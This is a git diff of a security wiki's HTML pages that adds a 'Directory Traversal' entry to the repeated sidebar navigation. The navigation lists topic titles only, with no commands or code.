      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

DNS

- - diff --git a/docs/Networking/Protocols/Ethernet (IEEE 802.3).html b/docs/Networking/Protocols/Ethernet (IEEE 802.3).html index ea2bec0a..4419e189 100644 --- a/docs/Networking/Protocols/Ethernet (IEEE 802.3).html +++ b/docs/Networking/Protocols/Ethernet (IEEE 802.3).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -210,22 +210,6 @@

802.1 - - diff --git a/docs/Networking/Protocols/File Transfer Protocol (FTP).html b/docs/Networking/Protocols/File Transfer Protocol (FTP).html index 121fa0e3..17f7cafa 100644 --- a/docs/Networking/Protocols/File Transfer Protocol (FTP).html +++ b/docs/Networking/Protocols/File Transfer Protocol (FTP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -297,22 +297,6 @@

Replies

- - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html index 7b946825..7803ed51 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
